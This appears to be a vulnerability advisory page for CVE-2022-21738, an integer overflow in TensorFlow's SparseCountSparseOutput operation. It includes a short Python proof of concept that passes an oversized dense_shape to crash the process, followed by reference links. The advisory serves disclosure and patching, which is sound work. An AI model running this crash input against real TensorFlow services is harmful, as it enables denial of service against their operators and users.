CVE-2022-21738: Integer overflow leading to crash in Tensorflow
(updated )
The implementation of SparseCountSparseOutput
can be made to crash a TensorFlow process by an integer overflow whose result is then used in a memory allocation:
import tensorflow as tf
import numpy as np
tf.raw_ops.SparseCountSparseOutput(
indices=[[1,1]],
values=[2],
dense_shape=[2 ** 31, 2 ** 32],
weights=[1],
binary_output=True,
minlength=-1,
maxlength=-1,
name=None)
References
- github.com/advisories/GHSA-x4qx-4fjv-hmw6
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-62.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-117.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/count_ops.cc
- github.com/tensorflow/tensorflow/commit/6f4d3e8139ec724dbbcb40505891c81dd1052c4a
- github.com/tensorflow/tensorflow/security/advisories/GHSA-x4qx-4fjv-hmw6
- nvd.nist.gov/vuln/detail/CVE-2022-21738
Detect and mitigate CVE-2022-21738 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →